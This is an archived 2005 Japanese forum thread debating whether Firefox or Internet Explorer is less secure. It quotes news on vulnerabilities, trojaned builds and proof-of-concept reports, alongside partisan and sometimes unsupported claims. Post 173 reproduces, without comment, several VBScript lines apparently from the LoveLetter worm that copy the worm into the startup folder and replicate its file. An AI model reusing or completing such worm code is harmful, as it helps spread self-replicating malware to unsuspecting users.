【Firefox】IEより多かったセキュリティ脆弱性

[表示 : 全て最新50 1-99 101- 201- 301- 2chのread.cgiへ]
Update time : 05/09 12:36 / Filesize : 88 KB / Number-of Response : 318
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/08/13(土) 18:01:31 ID:iWBNLj7J0]: Recently Symantec, the anti-virus security company, released a security report and in that report they pointed out that according to their test IE's
render engine is much more secure than the Firefox render engine.

最近、Symantec(アンチウイルス警備会社)はセキュリティレポートを発表しました。そして、そのレポートでは、
Microsoft Internet Explorerのエンジンでレンタリングする方が　Firefoxのエンジンを使ってレンダリングするよりはるかに安全だと指摘しました。
www.bbcworld.com/content/template_clickonline.asp?pageid=665&co_pageid=2

Mozilla 製品には Internet Explorer よりもより多くのセキュリティ脆弱性があると報じられたのは、これが初めてではない。
3月には Symantec が Internet Security Threat Report Volume VII 【訳注：インターネットのセキュリティへの脅威関する報告 VII】を公開し、
2004年後半の状況を報告している。同報告は次のように述べている。「ブラウザに影響する脆弱性の発見は増加傾向にあり、この期間に報告された
Mozilla の脆弱性は Microsoft Internet Explorer の脆弱性よりも多い ... 2004年 7月 1日から 12月 31日までの間、
Symantec は Microsoft Internet Explorer に影響する脆弱性を 13 件報告しているが、この件数は、同期間中に Mozilla 製品で報告された 21 件と比較して、
明らかに少ない。Opera では 6 権の脆弱性が報告されており、Safari では報告されていない。」
slashdot.jp/journal.pl?op=display&uid=12840&id=310454
116 名前：112 mailto:sage [2005/09/24(土) 17:44:23 ID:JKbW/6bF0]: >>115
そう。
素のFirefoxはタブブラウザのくせに新しいウィンドウをバンバン開くからTabMixで黙らせた。
RSSリーダ入れようと思ったけどいいのが無かったんでMirandaで拾ってる。
117 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 21:44:36 ID:qCy15ixo0]: 別ブラウザの話（事実と異なる）をしている人が、
「Firefox　IEより多かったセキュリティ脆弱性」というスレッドに沸いているのがちと不思議
118 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 22:21:40 ID:plI4QWGe0]: >>116
RSSをMirandaで拾うって・・
知らんソフトだったからググって見たけどそんな用途に使えるとは。すげーなｗ

>>117
別ﾌﾞﾗｳｻﾞの話して悪かった。
でも事実と異なることは話してないと思うぞ。
例えばどのへん？
119 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/25(日) 04:28:57 ID:Zwu1xzPH0]: >>118
オレも的外れなことを書いていると分かったけど、スレちがいだからレスを我慢したクチだよ。
そういう話題はよそへ移動した方がよいと思う。
火狐愛好者が便乗してきて、話題をほかのブラウザに変えるのも心配だしね。
120 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/25(日) 04:54:29 ID:lMdliH7p0]: >>119
君がっかりスレにもいなかったっけ？
121 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/25(日) 04:59:29 ID:Zwu1xzPH0]: >>120
おらん。
122 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/26(月) 09:31:12 ID:MNfm2REa0]: Firefoxのセキュリティ・ホールを突く危険なコードが出回る

米SANS Instituteなどは米国時間9月23日，Firefoxなどに見つかった
セキュリティ・ホール「IDNバッファオーバーフロー問題」を突くコード（プログラム）が
ネット上で公開されているとして注意を呼びかけた。そのコードが含まれるページを
Firefoxで閲覧すると，リモートからアクセス可能なシェルが起動され，
攻撃者にパソコンを乗っ取られる可能性がある。

itpro.nikkeibp.co.jp/article/NEWS/20050924/221614/
123 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/26(月) 18:08:43 ID:a6bnxBsV0]: Firefoxのセキュリティ・ホールを突く危険なコードが出回る
itpro.nikkeibp.co.jp/article/NEWS/20050924/221614/

米SANS Instituteなどは米国時間9月23日，Firefoxなどに見つかった
セキュリティ・ホール「IDNバッファオーバーフロー問題」を突くコード（プログラム）が
ネット上で公開されているとして注意を呼びかけた。そのコードが含まれるページを
Firefoxで閲覧すると，リモートからアクセス可能なシェルが起動され，
攻撃者にパソコンを乗っ取られる可能性がある。
9月23日に日本語版が公開されたFirefox 1.0.7ではこのセキュリティ・ホールは解消されている

>>122
引用するならちゃんと1.0.7でパッチ当たってるとこまで引用しなよｗ
124 名前：名無しさん＠お腹いっぱい。 [2005/09/27(火) 01:04:54 ID:s2h1V+nW0]: トロイに感染したMozillaとThunderbirdがMozillaの公式FTPサイトにアップ
ttp://internet.watch.impress.co.jp/cda/news/2005/09/26/9248.html
工工エエェェ（´Д｀）ェェエエ工工

インストールするだけでスリルとサスペンスが味わえる素敵なブラウザ　Firefox
インストールするだけでスリルとサスペンスが味わえる素敵なブラウザ　Firefox
インストールするだけでスリルとサスペンスが味わえる素敵なブラウザ　Firefox　
125 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/27(火) 01:19:07 ID:opYn+JI80]: >>124
なぜ「韓国語版」というとこを引用しませんか
126 名前：名無しさん＠お腹いっぱい。 [2005/09/27(火) 02:27:10 ID:nsLh+TDK0]: 火狐ズタボロ
ﾃﾗｶﾜｲｿｽ
127 名前：名無しさん＠お腹いっぱい。 [2005/09/27(火) 04:26:14 ID:deFs5FiD0]: >>122や>>124 のように自分の都合の悪い部分を引用しない
不公正な記事紹介者に惑わされてはいけません。正しい知識を身につけるには自分で調べることが大切です。

Google 検索　"脆弱性　IE　Firefox"
www.google.co.jp/search?q=%90%C6%8E%E3%90%AB%81%40IE%81%40Firefox&ie=Shift_JIS&num=20&hl=ja&lr=lang_ja&btnG=Google+%8C%9F%8D%F5

Google News 検索　"脆弱性　IE　Firefox"
news.google.co.jp/news?q=%E8%84%86%E5%BC%B1%E6%80%A7%E3%80%80IE%E3%80%80Firefox&num=20&hl=ja&lr=lang_ja&inlang=ja&sa=N&tab=wn
128 名前：名無しさん＠お腹いっぱい。 [2005/09/27(火) 05:27:07 ID:M1jFvEgd0]: >>122や>>124の元記事を読みましたが、事実を歪曲した変な記事ではなかったです。
公式サイトに韓国版がアップされたということは、日本語版でも同様の事件が起きる可能性があったと感じます。
>>122の記事も最新版へ版を上げるのが半日でも遅ければ、被害を受けてしまう可能性が示唆されている緊迫感が溢れた内容でした。
漏れの胸には、>>122や>>124の元記事がズンと響きました。(｀Д´；)
129 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/27(火) 08:04:46 ID:k4CB8WNT0]: 使わなきゃいいだろ
130 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/27(火) 10:25:51 ID:cIuQPL1X0]: やっぱりIEが一番安全だね。
MS謹製は伊達じゃないね。
131 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/27(火) 20:16:28 ID:/uGK3lAg0]: GNUかどっかのFTPも一時期ハックされたよな
132 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/28(水) 23:46:38 ID:CdgqJAxR0]: >>128
どこからどこが同様な事件なのか謎だな。モジラコリアと別組織のMozilla Japanで同じことが
起きる可能性なら、別のオープンソース系のプロジェクトも同じくらいだろうし。
まあ汚染されたローカライズ版がローカライズ元のヘマでMozilla.orgのFTPにあがる危険性も
今回の失敗を反省せずにケンチャナヨな仕事しないかぎりローカライズ版も安心だろう。
そもそもローカライズ版なんて公式に置いてあろうがその言葉使う人間しか使わないもんだしな。

個人的にはハングル版は使う予定はないし、MozillaJapanが信用できないようなら
次のブラウザ決めるまではそういう事が起きる可能性の低い英語版使うだろうな。

怖いなら他のブラウザに乗り換えればいいんだよな、幸い火狐も雷鳥も人に勧めた事もないし・・・
133 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/29(木) 02:01:03 ID:lKrqHRhw0]: 勝手につけられた「公式」という言葉に惑わされている人間がいるな
自分でよく情報を精査してみたら？

あと、オープンソースVSマイクロソフトという図式を
意図的に作り出そうとしている人間もいるから要注意。

MSNのサイトだって凶悪なウイルスをばら撒いていたこともあることだし
134 名前：名無しさん＠お腹いっぱい。 [2005/09/29(木) 22:07:46 ID:28f7dZxc0]: ttp://internet.watch.impress.co.jp/cda/news/2005/09/29/9294.html
Geckoエンジンに由来する脆弱性、Lunascapeにも影響

ほかの製品の足まで引っ張ってるんだな（汗
しょうもない。
135 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/29(木) 23:17:40 ID:sodlPqrm0]: マルチエンジンだとそれぞれのエンジンの脆弱性というリスクを背負ってるからな。
136 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/30(金) 21:28:48 ID:aoJUMEOC0]: それこそIEだとほぼ全滅だろうが（ﾜﾗ
137 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/01(土) 10:38:30 ID:TeRyCRtr0]: Gecko外せば良い話だ＞Luna
すぐ外せ
138 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/01(土) 12:51:34 ID:0pB875gi0]: >>135
作者さんのリスクは増えるけどユーザのリスクは減ってる罠。
139 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/03(月) 16:14:41 ID:KyL+RY7o0]: 報告された弱点と実際のセキュリティはFirefoxの優位性を示している
www.itmedia.co.jp/enterprise/articles/0509/26/news027.html

106ページから成るSymantecのリポートでは、ブラウザの弱点についての記述は僅かな部分を占めているにすぎない。
しかし、業界紙はFirefoxの弱点がIEよりも多いというニュースを大きく取り上げていた。

Firefoxのほうが「報告された」弱点は多いかもしれないが、実際のエクスプロイトを見つけるのは難しい。
Mozillaプロジェクトの製品ヘッドを務めるクリス・バード（Chris Beard）氏は、Firefoxの弱点に対して実際に攻撃があったという話は聞いていないと言った。
140 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 00:46:19 ID:xKhAwCWo0]: ttp://japan.cnet.com/news/sec/story/0,2000050480,20085483,00.htm
またFirefoxのプロモーションサイト侵入事件　ユーザー10万人の個人情報流失の可能性

Firefoxは何から何までクソだな
141 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 01:58:41 ID:SHwKQQlj0]: 最近変な動作が多いと思ったら、これが原因か。
こんな事なら、IEから乗り換えるんじゃなかった・・・

こんな無責任なブラウザ、もう二度と使わない。
142 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 03:56:23 ID:qkQVgx2n0]: そう？俺は逆でIEの頃はバンバンブラクラやスパイウェア喰らいまくり、
その他原因不明のエラーで落ちまくったけど、Firefoxにしてからはそんなことは一度もなくなったよ。
別世界のように安定してる。もっと早く決断しとくべきだったよ。

それに、すぐにFirefoxに責任転嫁するのはちょっと時期尚早じゃないんかい？
ちゃんと検証してからじゃないと逆に問題解決が遠くなるよ。スパイウェアやウィルスの働きかもしれないし。
特にIEの人は知らないうちにスパイウェアやウィルス喰らっててそういうのが多いんだよね。一度ちゃんと調べてもらうことをおすすめするよ。
143 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/07(金) 09:03:37 ID:SgY26LkG0]: >>141
>>140で書いてある情報の流出はFirfoxの動作と関係ないと思うぞ。
144 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/07(金) 09:05:03 ID:SgY26LkG0]: まちがった。orz
×Firfox
○Firefox
145 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 13:59:36 ID:F7fGvN3p0]: 正直、個人情報一切持ってない俺には脆弱性なんてどうでもいい
146 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 14:03:24 ID:6nZKQfvl0]: IP自体立派な個人情報
147 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/07(金) 22:59:25 ID:Y4/nGif40]: ああそう
148 名前：名無しさん＠お腹いっぱい。 [2005/10/12(水) 00:39:13 ID:jHMQxzfP0]: Firefox 1.0.7でリモートから攻撃可能なスタックオーバーフローが見つかる
ttps://www.netsecurity.ne.jp/1_4621.html

また糞foxのでかいセキュ穴・・・・。Linux使いなんでクマったよ。('A`)
149 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/12(水) 01:10:02 ID:UhKZX0zs0]: ＞IP自体立派な個人情報
IPは全世界共通のプロトコルです。
IPアドレスは利用者の氏名、住所、その他の個人情報を特定するものではありません。
つまり個人情報ではありません（個人情報保護法より）

結論だけ言うとｱﾎかと。
150 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/12(水) 01:40:25 ID:tuzXIcIz0]: GATEKEEPERにとっては困ることだ
151 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/12(水) 15:08:18 ID:Ucs66PI80]: どうでもいいよ
152 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/12(水) 20:55:31 ID:JyuiqZsS0]: >>149
他のデータと照合することにより個人を特定できる場合は
個人情報として認められるんじゃなかったか
153 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/13(木) 00:22:56 ID:nmeBryoK0]: IPアドレス（とその接続時刻）から個人を割り出せるのって基本的にISPだけじゃないの？
154 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/13(木) 04:43:57 ID:OkmmlNcx0]: SMTP over SSL でヘッダーに付くIPアドレスから
引き篭ってることがバレる。Webメールを使おう。
155 名前：名無しさん＠お腹いっぱい。 [2005/10/14(金) 16:25:20 ID:EeTPCnwU0]: 脆弱性とかどうでもいい
昔は脆弱性ぐらいでスレ乱立しなかったし
156 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/14(金) 22:35:00 ID:5mcfrceg0]: どうでも良いとはいわないけど、本気で脆弱性を気にしだしたらWindows使うなってことになりかねない。
じゃあ、何を気にすればいいんだっていったら、速やかにパッチされるかどうかってことじゃない？

一番困るのは放置プレイ。
157 名前：名無しさん＠お腹いっぱい。 [2005/10/17(月) 19:06:38 ID:CKId7XO40]: pc8.2ch.net/test/read.cgi/sec/1127257870/732-797

797 名前：名無しさん＠お腹いっぱい。[] 投稿日：2005/10/17(月) 18:58:02
>>792
つまりFirefoxが糞ということでFAなw
158 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/17(月) 19:30:05 ID:DN35F2g10]: >>157
IEと互換性を高めるためにFxは
www.rakuiti.com/favicon.ico
を呼びにいってるけどそのファイルがhtmlだからNOD32さんが誤検出してるだけっぽい。(どの時点で検出してるか知らないけど。ディスクキャッシュ辺り?)
IEはリダイレクト時は/favicon.icoを呼びにいかない仕様なのかな?(それともMOD32がfaviconを取得できてないのか)
#セキュリティ板ってレヴェル低いなw
159 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/17(月) 19:36:15 ID:0eAiplk60]: セキュ板より通信技術板のほうがいい
160 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/17(月) 22:40:18 ID:uusxxYP90]: >>158
MOD32 の検索結果約 11,700 件中 1 - 50 件目 (0.31 秒)
161 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 06:30:47 ID:xjmjx5C20]: IEだったらいまごろどんだけウィルスかかってたか
162 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 06:39:38 ID:xjmjx5C20]: まぁ自身は火狐使ってなくてスレイプニルだけど・・
他のブラウザの存在しってたらIEなんか使わないだろ
というかIE開こうとしてもなんかのエラーで開かないよ　プニルも火狐も使えるのに
糞ウィンドウズが壊れてきたのかな
163 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 06:42:06 ID:xjmjx5C20]: IEはウィンドウズの一部だからな・・・欠陥OS　XP・・・
データ退避させないといけないのか、メンドいな
164 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 07:06:32 ID:wIuHDK4u0]: またなんか公開されてるみたいだな
165 名前：名無しさん＠お腹いっぱい。 [2005/10/18(火) 13:54:07 ID:K/eKfqzB0]: Mozilla Firefoxブラウザの致命的でないバグを利用して、サービス停止（DoS）攻撃を
引き起こすことができると、Whitedust Securityが指摘している。

同サイトはこの主張を証明するための脆弱性実証コードと単純なテストリンクを公開した。
ttp://www.itmedia.co.jp/enterprise/articles/0510/18/news018.html
このコードが利用するバグはMozillaにとって既知のものだ。これは8月からMozillaの
バグトラッキングシステムである「Bugzilla」に掲載されていた。

このBugzilla Bug 303433は初めsecurity-protocols.comのトム・フェリス氏が報告し、
「この不正な形式の.htmlページでFirefox 1.0.6のsegfaultsが起きる」というタイトルが付けられている。
セキュリティ企業Secuniaは10月10日にこのバグに関するアドバイザリを掲載し、
「Mozilla Firefox IframeサイズのDoSの脆弱性」という題と「Not critical（致命的でない）」という評価を付けている。

「ブラウザを繰り返しクラッシュさせられるというのは致命的なバグではないかもしれないが、
もっと時間があればDoS攻撃を利用してより深刻な攻撃を仕掛けられる可能性がある」と
Whitedustのマーク・アンダーソン氏。

「定義に従えば、このバグは明らかにDoSだ。ブラウザをクラッシュさせることで、
このバグはユーザーの閲覧行為を中断させ、実質的にはすべてのアクティブなセッションを破壊して、
サービスを停止する」（同氏）
166 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 16:10:20 ID:wF9ubEvV0]: >>165
それいうんだったらcssがらみでもっとクラッシュバグがいっぱいあったはず。
それよりも<img src="mailto:">をどうにかして欲しい。
167 名前：名無しさん＠お腹いっぱい。 [2005/10/18(火) 18:34:00 ID:FzjzmHXj0]: >>158

>それともNOD32がfaviconを取得できてないのか
IEは「お気に入り」登録する時にfavicon取得する仕様だからな。
おまえってレヴェル低いなw
168 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:29:18 ID:wF9ubEvV0]: >>167
Windows環境ないんで。
どっちにせよFxではdataスキーマでhtmlファイルに埋め込まれるから安全。
169 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:29:36 ID:FqqHA8U60]: >>162
IEの脆弱性はIEコンポ使ってるブラウザにも波及するわけだが
170 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:45:47 ID:JZAhOkEt0]: javascriptとかcookieとかを簡単に切れる分、生IEよりはましじゃん。
まあLynxを使ってる俺には関係ない話だが。
171 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:46:55 ID:JZAhOkEt0]: やった、IDがAhOだｗ
172 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 21:07:45 ID:FzjzmHXj0]: >>171
オメ!w

ついでに賛美しといてやるw

>>171の Σ^)/アホーアホー☆ミ
173 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/19(水) 01:19:48 ID:Da9E51cb0]: fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
174 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/19(水) 18:36:56 ID:ZlOmEkpw0]: ブラウザならW3Cオススメの Amaya を使ってみれ。
ttp://www.w3.org/Amaya/
175 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/19(水) 21:40:54 ID:yF+pppXI0]: >>174
日本語対応?
176 名前：名無しさん＠お腹いっぱい。 [2005/10/20(木) 01:17:04 ID:UHOcCHcq0]: あやや？
反りっ鼻ブスのことか？
177 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/31(月) 14:21:27 ID:oKU9sXP90]: Windows Vista Beta 1 and Internet Explorer 7 Beta 1 BUGS,BUGS,BUGS!!!

ttp://www.thehotfix.net/bugs.html
178 名前：名無しさん＠お腹いっぱい。 [2005/11/17(木) 21:58:08 ID:FZokDkCp0]: >>158
何これ
支那人にいたずらされたんか
179 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/03(土) 17:03:09 ID:T/u9tYTz0]: パッチ未公開のIEの脆弱性を突くトロイの木馬「Delf.DH」
180 名前：名無しさん＠お腹いっぱい。 [2005/12/10(土) 05:07:25 ID:w97Gl0WE0]: Firefox 1.5のバグを悪用する実証コードが公開に - CNET Japan
japan.cnet.com/news/sec/story/0,2000050480,20092526,00.htm

火狐なんてまだ使ってる馬鹿いるのか？
181 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/10(土) 05:49:31 ID:bX3v34mU0]: つーかさ、オープンソースってことは
最初のうちは開発者みたいな顔して開発に参画しててｺｿｰﾘ見つかりにくく脆弱性仕込んどいて
しばらくしたら何食わぬ顔でハッカーに変貌する香具師とかいるんじゃね？
やっぱマイクロソフト製品ぐらいしか信用できんよなあ
182 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/10(土) 13:05:00 ID:udSGLeL/0]: つーかさ、プロプライエタリってことは
最初のうちは社員みたいな顔して開発に参画しててｺｿｰﾘ見つかりにくく脆弱性仕込んどいて
しばらくしたら何食わぬ顔でハッカーに変貌する香具師とかいるんじゃね？
やっぱオープンソース製品ぐらいしか信用できんよなあ
183 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/10(土) 18:59:12 ID:KTTeMXRO0]: 新版早々脆弱性かよｗｗ
184 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 00:15:36 ID:2T58xXUG0]: >>180
japan.cnet.com/news/sec/story/0,2000050480,20092526,00.htm
> Mozilla Corpのエンジニアリング担当バイスプレジデントMike Schroepferによると、
> 特定のウェブサイトにアクセスしても、ブラウザがクラッシュしたり、DoS攻撃の危険にさらされることはなかったという。
> また、Mozillaのエンジニアリング担当バイスプレジデントMike Schroepferは、
> このような問題に遭遇したとの報告は一件も届いていないと述べている。
> 同氏はさらに、history.datファイルのバグが原因で、次回以降Firefox 1.5の起動に時間がかかることもあるが、
> これはセキュリティの問題ではないと付け加えた。

www.mozilla-japan.org/security/history-title.html
> 私たちはこの問題を調査し、
> このサービス拒否 (DoS) 攻撃が応用されて悪用可能なクラッシュを引き起こす可能性があるとの主張には根拠がないこと、
> またこの主張を裏付ける証拠が提供されていないことを確認しました。
> ユーザやコンピュータに、起動時の一時的な不応答を超えるリスクはないと考えられます。
> この問題に遭遇した方は、履歴からアイテムを削除することで、起動時の不応答を回避できます。

セキュリティグループとやらの程度が知れるな。アンチ乙
185 名前：名無しさん＠お腹いっぱい。 [2005/12/11(日) 01:19:50 ID:mokY+t5T0]: >>184みたいな信者は開発者のデムパ主張しか信じない厨w
186 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 01:37:04 ID:QxDYz2sr0]: secunia.com/advisories/17934/
Critical: Not critical
187 名前：名無しさん＠お腹いっぱい。 [2005/12/11(日) 02:19:27 ID:EMCnSYvp0]: >>184
>ユーザやコンピュータに、起動時の一時的な不応答を超えるリスクはないと考えられます。

いや、これだけでも十分にリスキーなんですけどｗ
頭悪いの？
188 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 02:23:08 ID:EeAErw2M0]: そりゃあ火狐厨は頭が悪いだろう
189 名前：名無しさん＠お腹いっぱい。 [2005/12/11(日) 02:31:00 ID:puyV5qE70]: FirefoxやIEなんて目じゃないぜ！Operaﾏﾝｾｰ
my.opera.com/community/customize/wallpapers/store/117/1280x1024/117.jpg
190 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 12:52:34 ID:4mPkCyG80]: Firefix 1.0.7を使ってる漏れは勝ち組
191 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 16:40:12 ID:2T58xXUG0]: >>187
"セキュリティ"の問題は無いっていう話なんだけど？スレタイ読める？
192 名前：名無しさん＠お腹いっぱい。 [2005/12/11(日) 18:43:50 ID:MTqpslBK0]: 正直、脆弱性の数より危険度を重視すべきだと思うがなあ。
firefoxの脆弱性つっても、せいぜいブラウザ蛾落ちる程度だろ。
IEの脆弱性は、OS蛾ぶっ壊れるからなあ。
firefox使えとは言わないが、IEはやめたほうがいいと思われ。
193 名前：名無しさん＠お腹いっぱい。 [2005/12/12(月) 04:53:36 ID:KW/pB/3n0]: >>192
で？何を使えと？
194 名前：名無しさん＠お腹いっぱい。 [2005/12/12(月) 19:42:27 ID:NE5OKcoP0]: w3m
195 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/12(月) 20:30:49 ID:8Cp//zIN0]: 氏ね
196 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/13(火) 15:35:59 ID:7IzOp8080]: history.datの問題って、Bugzillaに報告すべきただのバグなのに
脆弱性とか言っちゃってるよw。

エクスプロイトコード書いた奴は、うれしくてしょうがなかったん
だろうなw。
197 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/13(火) 20:38:37 ID:zqYfAndE0]: 信者必死だなｗ
198 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/13(火) 20:42:17 ID:mWKy6MMO0]: それしか言えなくなってるのか
199 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 03:16:21 ID:VKxsdWbQ0]: 脆弱性がバグなのはあたりまえだろ。
200 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 15:22:19 ID:PH3NZo5f0]: >>199
脆弱性はバグが引き起こすものだが、バグがすべて脆弱性とは限らない。
201 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 18:59:40 ID:yBgh1OmtP]: ┐(´ー｀)┌
202 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 20:33:55 ID:uURjVkAx0]: 114 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2005/12/12(月) 09:19:54 ID:kmCvCNIb0
IEとIEコンポのタブブラウザを使っていると個人情報が簡単に抜かれんだと。
対処法はJavaScriptを切るしかないみたいだ。アンチウィルスソフト使ってても駄目。
ttp://d.hatena.ne.jp/hoshikuzu/20051209#P2005209MATANGILLON

問題はローカルのcssっぽく偽装したJavaScriptファイルを
IEが勝手に内容から判断して実行するからだそうな。

これを検証してたら実はシャレにならないバグだと分かったらしい。
IEの欠陥により、Google Desktopに情報漏洩の危険性
ttp://slashdot.jp/security/article.pl?sid=05/12/03/0857215
203 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 21:03:27 ID:PH3NZo5f0]: >>201
お前アホだろ。
204 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 21:13:34 ID:yBgh1OmtP]: >>203
ちょっとまてｗｗ
その顔文字>>200に向けたのではないぞ。
205 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 21:51:26 ID:PH3NZo5f0]: >>204
なんだよ。まぎらわしいな。
206 名前：モジラ財団、「Firefox 1.5」のバグを認める mailto:モジラ財団、「Firefox 1.5」のバグを認める [2005/12/15(木) 02:41:30 ID:UnscJ5bc0]: モジラ財団、「Firefox 1.5」のバグを認める
モジラ財団、「Firefox 1.5」のバグを認める
モジラ財団、「Firefox 1.5」のバグを認める
モジラ財団、「Firefox 1.5」のバグを認める
モジラ財団、「Firefox 1.5」のバグを認める
japan.cnet.com/news/media/story/0,2000047715,20092716,00.htm

（　´,_ゝ`）ﾌﾟｯ
207 名前：名無しさん＠お腹いっぱい。 [2005/12/15(木) 02:56:01 ID:n3W7HDHb0]: ＳＬで快適
208 名前：名無しさん＠お腹いっぱい。 [2005/12/15(木) 03:21:35 ID:mwBZzwM60]: プラグイン方式について
209 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/15(木) 23:29:40 ID:S6+sTIrr0]: >>206
良く見ろ。書いてることは>>184と同じことだぞ。
脆弱性があるとは書かれていない。
210 名前：名無しさん＠お腹いっぱい。 [2005/12/16(金) 22:43:03 ID:xGEphufr0]: ネスケとかオペラ使えばいいんじゃね？
211 名前：モジラ財団、「Firefox 1.5」のバグを認める mailto:モジラ財団、「Firefox 1.5」のバグを認める [2005/12/17(土) 04:22:56 ID:pY7DWO/B0]: >>209
> 良く見ろ。書いてることはバグを認めたと同じことだぞ。
モジラ財団、「Firefox 1.5」のバグを認めると書いてある。
212 名前：209 mailto:sage [2005/12/20(火) 23:11:54 ID:NDDLEcgS0]: >>211
いや、だからタイトルじゃなくて記事の「内容」を良く見ろってこと。
書いていることは>>184と同じ。
そのタイトルは、変。japan.cnet.comが書きそうなタイトルだな。
213 名前：名無しさん＠お腹いっぱい。 [2005/12/21(水) 00:36:31 ID:XWV4ug+A0]: やっぱりIEのほうがよさそう
総合的に見て。
214 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/23(金) 01:52:20 ID:3QlUndqw0]: >>212
必死な信者
215 名前：名無しさん＠お腹いっぱい。 [2005/12/26(月) 21:27:35 ID:ktemxUtf0]: ソース読んでみたけど最低17箇所で特許侵害およびGPLソースのコピペが確認できたよ。
マジやばいな。
216 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/26(月) 22:34:30 ID:oIwQzFC30]: >>215
ほう、祭りの予感がw

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef